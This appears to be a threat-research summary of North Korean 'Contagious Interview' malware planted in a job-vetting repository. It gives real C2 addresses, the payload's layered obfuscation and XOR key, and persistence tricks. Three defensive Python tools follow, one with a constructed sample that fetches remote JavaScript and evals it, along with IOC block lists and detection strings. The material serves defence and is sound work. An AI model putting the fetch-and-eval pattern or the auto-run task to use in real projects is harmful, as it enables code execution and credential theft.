Hunting Lazarus - Inside the Contagious Interview C2 Infrastructure
In early January 2026, during routine vetting of a cryptocurrency project sourced via Upwork, Red Asgard’s threat research team discovered North Korean malware. The contractor, working under a fake identity, had embedded it in a legitimate-looking code repository. What followed was a five-day investigation into active Lazarus Group infrastructure. The repository contained three distinct infection mechanisms: (1) VSCode auto-execution via a .vscode/tasks.json file configured with runOn: folderOpen; (2) backend RCE via Function.constructor in an errorHandler.js file; and (3) cookie payload delivery (Vynlence variant) through a getCookie() function that fetches malicious JavaScript from a C2.
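The three mechanisms above are all visible in the repository before anything is executed, so they can be screened for during vetting. The following is an added example of such a pre-vetting scanner; it is not Red Asgard tooling and the sample repository files are constructed. The regexes are heuristics (an assumption about how the patterns appear in source), and the JavaScript API names they look for (fetch, axios, eval, new Function) are the real ones.

```python
"""Repository pre-vetting scanner (added example, not Red Asgard tooling).

Looks for the three infection mechanisms described in the text:
  1. .vscode/tasks.json tasks with runOptions.runOn == "folderOpen"
  2. Function.constructor / new Function() / eval dynamic code construction
  3. a getCookie() helper that performs a network fetch and evaluates the result
All sample files at the bottom are constructed for the demo.
"""
import json
import os
import re

# Heuristic patterns (assumption: this is how the indicators appear in source).
DYNAMIC_EXEC = re.compile(r"Function\.constructor|new\s+Function\s*\(|\beval\s*\(")
NETWORK_CALL = re.compile(r"\bfetch\s*\(|\baxios\b|\bhttps?\.get\s*\(|\brequest\s*\(")
GETCOOKIE_DEF = re.compile(
    r"(?:function\s+getCookie\s*\(|getCookie\s*=\s*(?:async\s*)?(?:function|\())"
)


def _strip_jsonc_comments(text):
    """tasks.json is JSON-with-comments; drop // and /* */ comments before parsing."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)


def scan_tasks_json(text):
    """Return the labels of tasks that auto-run when the folder is opened."""
    try:
        doc = json.loads(_strip_jsonc_comments(text))
    except json.JSONDecodeError:
        # Unparseable but still carrying the trigger: flag it rather than miss it.
        return ["<unparseable tasks.json>"] if "folderOpen" in text else []
    hits = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            hits.append(task.get("label", "<unlabelled>"))
    return hits


def scan_js_source(text):
    """Return indicator names found in one JavaScript file."""
    found = []
    if DYNAMIC_EXEC.search(text):
        found.append("dynamic-code-construction")
    if GETCOOKIE_DEF.search(text) and NETWORK_CALL.search(text) and DYNAMIC_EXEC.search(text):
        found.append("getcookie-remote-payload")
    return found


def scan_repo(files):
    """files: {relative_path: content}. Returns (path, indicator) findings."""
    findings = []
    for path, content in files.items():
        norm = path.replace("\\", "/")
        if norm.endswith(".vscode/tasks.json"):
            for label in scan_tasks_json(content):
                findings.append((path, f"vscode-folderOpen-task:{label}"))
        elif norm.endswith(".js"):
            for indicator in scan_js_source(content):
                findings.append((path, indicator))
    return findings


def scan_directory(root):
    """Convenience wrapper: walk a checked-out repository on disk."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".js") or name == "tasks.json":
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return scan_repo(files)


# Constructed sample repository (not the real project files).
SAMPLE_REPO = {
    ".vscode/tasks.json": """{
  // constructed: runs "npm install" the moment the folder is opened
  "version": "2.0.0",
  "tasks": [
    { "label": "install", "type": "shell", "command": "npm install",
      "runOptions": { "runOn": "folderOpen" } }
  ]
}""",
    "src/errorHandler.js": "module.exports = (err) => { Function.constructor('return 1')(); };\n",
    "src/utils.js": "async function getCookie(name) { const r = await fetch(BASE + name); eval(await r.text()); }\n",
    "src/clean.js": "export const add = (a, b) => a + b;\n",
}

if __name__ == "__main__":
    for path, indicator in scan_repo(SAMPLE_REPO):
        print(f"{path}: {indicator}")
```

The tasks.json check parses the file rather than grepping it, because runOn can sit inside a runOptions object several levels down; the comment stripper is needed because VSCode accepts comments that json.loads rejects. Run scan_directory() against a fresh clone before opening it in an editor, since the folderOpen trigger fires at the moment the folder is opened.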
All three vectors pointed to Vercel-hosted Stage 1 C2 servers. The infrastructure mapped included Stage 2 dedicated C2 servers such as 147.124.213.232 and 147.124.212.125, all running Windows Server 2019/2022 with Express.js on port 1244, pyftpdlib FTP on port 21, and RDP/WinRM for operator access. The C2 serves modular payloads via token-authenticated endpoints, including a Chrome stealer, an extended stealer, a network module, a MetaMask injector, and the Tsunami backdoor. The bro_*.js payload is wrapped in 64 nested obfuscation layers: Layer 1 is Base85 + XOR (key: Vw1aGYoP), and each subsequent layer is zlib + reversed base64. The final payload is a full-featured backdoor bundled with an XMRig cryptocurrency miner disguised as msedge.exe. The operators aren’t just stealing credentials; they’re also mining Monero on victim machines.
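The layer structure described above lends itself to an automated peeler: undo the known outer layer once, then keep undoing the repeating inner layer until it stops decoding. The code below is an added example written for this summary, not Red Asgard's own deobfuscation script. It assumes the order of operations inside each layer (Base85 decode then XOR; reverse the text, base64 decode, then zlib inflate) and that "Base85" means the RFC 1924 alphabet used by Python's base64.b85decode; the obfuscate() helper exists only to build a constructed sample of the same shape, and the 175KB Python payload is replaced by a one-line stand-in.

```python
"""Layered deobfuscator for the bro_*.js staging chain (added example, not the
Red Asgard tooling). Layer order follows the description in the text:
  layer 1      : Base85 + repeating-key XOR (key "Vw1aGYoP")
  layers 2..N  : zlib, then base64, then the base64 text reversed
The exact operation order inside each layer is an assumption; obfuscate()
exists only to build a constructed sample with the same shape.
"""
import base64
import binascii
import zlib

KEY = b"Vw1aGYoP"  # XOR key quoted in the report


def xor_repeating(data, key):
    """XOR every byte with the key byte at the same position modulo key length."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def peel_layer1(blob, key=KEY):
    """Outermost layer: Base85-decode, then undo the XOR."""
    return xor_repeating(base64.b85decode(blob), key)


def peel_inner(blob):
    """One inner layer: un-reverse the text, base64-decode, zlib-inflate.
    Raises if the blob is not an inner layer (used as the stop condition)."""
    return zlib.decompress(base64.b64decode(blob[::-1], validate=True))


def deobfuscate(blob, key=KEY, max_layers=64):
    """Peel layer 1, then inner layers until one fails to decode.
    Returns (payload, layers_peeled). max_layers bounds the loop so a final
    payload that happens to look like yet another layer cannot spin forever."""
    data = peel_layer1(blob, key)
    peeled = 1
    while peeled < max_layers:
        try:
            data = peel_inner(data)
        except (binascii.Error, zlib.error, ValueError):
            break  # not reversed-base64 + zlib any more: this is the payload
        peeled += 1
    return data, peeled


def obfuscate(payload, key=KEY, inner_layers=63):
    """Build a constructed sample with the same layer shape (demo helper only)."""
    data = payload
    for _ in range(inner_layers):
        data = base64.b64encode(zlib.compress(data))[::-1]
    return base64.b85encode(xor_repeating(data, key))


# Constructed final-stage stand-in; the real payload is a 175KB Python script.
SAMPLE_PAYLOAD = b'print("innermost layer reached")\n'

if __name__ == "__main__":
    sample = obfuscate(SAMPLE_PAYLOAD)
    payload, layers = deobfuscate(sample)
    print(f"peeled {layers} layers -> {payload!r}")
```

The stop condition relies on zlib's header and checksum validation plus strict base64 validation, which is why the loop can run blind through 63 inner layers and still halt on the plaintext; the max_layers cap is the safety net for the rare case where the final stage itself happens to decode. Adding a per-layer log of sizes and first bytes is the usual next step when a sample deviates from this pattern partway down.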
After deobfuscation, the 175KB Python payload reveals sophisticated persistence and monetization. Persistence mechanisms include a “Windows Update Script.pyw” in the Startup folder and a “Runtime Broker” scheduled task at logon, with Defender exclusions added via PowerShell. Masquerading uses the name “Runtime Broker.exe” for the installer and client and “msedge.exe” for the XMRig miner. Additionally, the Z238 host (66.235.168.238) runs a custom binary protocol on custom ports 22411-22412, which was cracked after observing a repeating 0xcb XOR pattern. During active reconnaissance, the operators responded to probing: 3 of 5 C2 services went offline mid-investigation, the Z238 custom ports closed after initial probes, and rate limiting was triggered after auth packet testing.
We assess with high confidence that this is Lazarus Group infrastructure. Evidence includes IP 147.124.212.125 being flagged by 14 VT vendors, the same /24 subnet being documented in Sekoia and Unit42 reports, and a TTP match: fake jobs -> GitHub -> VSCode -> crypto theft. Defensive recommendations include blocking the C2 IPs 147.124.213.232, 147.124.212.125, 216.250.251.87, 45.43.11.199, 66.235.63.55, 66.235.168.238 and 45.59.163.55. Network-level monitoring should alert on connections to 1244/tcp and 1249/tcp and hunt for FTP connections to the /DAhkMrMq7/ path. Host-level alerts should be set for “Windows Update Script.pyw” in the Startup folder, “Runtime Broker.exe” in non-standard locations, and “msedge.exe” in %LOCALAPPDATA%/Microsoft/Windows/Applications. YARA strings for detection include “!!!HappyPenguin1950!!!”, “TSUNAMI_INJECTOR”, “Windows Update Script.pyw”, and “G01d*8@(.”.
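The network and host recommendations above translate directly into matching logic. What follows is an added example of that logic, not the report's own detection content: the indicator values are the ones quoted in the text, while the event records are constructed (203.0.113.10 is a documentation address and 147.124.212.7 is an invented neighbour inside the listed /24, not an indicator). Treating the two Stage 2 servers' /24 blocks as a hunting lead is an assumption built on the report's note that the /24 appears in Sekoia and Unit42 reporting, and the %LOCALAPPDATA% expansion to <profile>\AppData\Local is standard Windows behaviour.

```python
"""IOC matcher for the defensive recommendations above (added example, not the
report's own tooling). Network events would normally come from a firewall or
Zeek conn log plus an FTP proxy log, file events from an EDR feed; the events
at the bottom are constructed for the demo.
"""
import ipaddress
import ntpath

# Indicators quoted in the report.
C2_IPS = {
    "147.124.213.232", "147.124.212.125", "216.250.251.87", "45.43.11.199",
    "66.235.63.55", "66.235.168.238", "45.59.163.55",
}
C2_PORTS = {1244, 1249}
FTP_PATH_MARKER = "/DAhkMrMq7/"
STARTUP_SCRIPT = "windows update script.pyw"
YARA_STRINGS = [b"!!!HappyPenguin1950!!!", b"TSUNAMI_INJECTOR",
                b"Windows Update Script.pyw", b"G01d*8@(."]
# Assumption: the /24 blocks of the two Stage 2 servers are worth a hunting
# lead (the report notes the /24 appears in Sekoia and Unit42 reporting).
WATCH_NETS = [ipaddress.ip_network(f"{ip}/24", strict=False)
              for ip in ("147.124.213.232", "147.124.212.125")]
# %LOCALAPPDATA% expands to <profile>\AppData\Local; the legitimate Edge
# binary lives under Program Files, never here.
MINER_DIR_SUFFIX = "\\appdata\\local\\microsoft\\windows\\applications"
# Windows' own broker is RuntimeBroker.exe (no space) in System32.
SYSTEM32 = "c:\\windows\\system32"


def check_network(ev):
    """ev: {"dst_ip", "dst_port", optional "uri"}. Returns alert names."""
    alerts = []
    ip = ipaddress.ip_address(ev["dst_ip"])
    if ev["dst_ip"] in C2_IPS:
        alerts.append("known-c2-ip")
    elif any(ip in net for net in WATCH_NETS):
        alerts.append("c2-neighbour-subnet")  # hunting lead, not a block decision
    if ev["dst_port"] in C2_PORTS:
        alerts.append(f"c2-port-{ev['dst_port']}")
    if ev["dst_port"] == 21 and FTP_PATH_MARKER in ev.get("uri", ""):
        alerts.append("c2-ftp-path")
    return alerts


def _norm(path):
    """Backslashes, case-folded, %LOCALAPPDATA% expanded to its usual location."""
    p = path.replace("/", "\\").casefold()
    return p.replace("%localappdata%", "c:\\users\\<user>\\appdata\\local")


def check_host_file(path):
    """Host-level checks from the report, applied to one observed file path."""
    directory, name = ntpath.split(_norm(path))
    alerts = []
    if name == STARTUP_SCRIPT:
        where = "startup-folder" if "\\startup" in directory else "elsewhere"
        alerts.append(f"windows-update-script-pyw ({where})")
    if name == "runtime broker.exe" and directory != SYSTEM32:
        alerts.append("runtime-broker-masquerade")
    if name == "msedge.exe" and directory.endswith(MINER_DIR_SUFFIX):
        alerts.append("msedge-in-localappdata-applications")
    return alerts


def match_yara_strings(data):
    """Plain substring version of the YARA strings, for quick triage of a file."""
    return [s.decode() for s in YARA_STRINGS if s in data]


def hunt(events):
    """Route each event to its checker; returns (event index, alert) pairs."""
    out = []
    for i, ev in enumerate(events):
        alerts = check_network(ev) if ev["kind"] == "net" else check_host_file(ev["path"])
        out.extend((i, a) for a in alerts)
    return out


# Constructed events (203.0.113.10 is a documentation address; 147.124.212.7
# is an invented neighbour of the listed /24, not an indicator from the report).
SAMPLE_EVENTS = [
    {"kind": "net", "dst_ip": "147.124.212.125", "dst_port": 1244},
    {"kind": "net", "dst_ip": "147.124.212.7", "dst_port": 443},
    {"kind": "net", "dst_ip": "66.235.168.238", "dst_port": 21, "uri": "/DAhkMrMq7/upload.bin"},
    {"kind": "net", "dst_ip": "203.0.113.10", "dst_port": 443},
    {"kind": "file", "path": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update Script.pyw"},
    {"kind": "file", "path": r"C:\Windows\System32\RuntimeBroker.exe"},
    {"kind": "file", "path": r"C:\Users\bob\AppData\Local\Temp\Runtime Broker.exe"},
    {"kind": "file", "path": "%LOCALAPPDATA%/Microsoft/Windows/Applications/msedge.exe"},
    {"kind": "file", "path": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"},
]

if __name__ == "__main__":
    for idx, alert in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {alert}")
```

The file-path checks are deliberately name-plus-location rather than name-only: msedge.exe and a broker process are expected on every host, and it is the directory that separates the miner and the spaced "Runtime Broker.exe" from their legitimate namesakes. The neighbour-subnet match is kept separate from the known-IP match so it can feed a hunt queue without being wired into a block list.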
To read the complete article, see: Hunting Lazarus.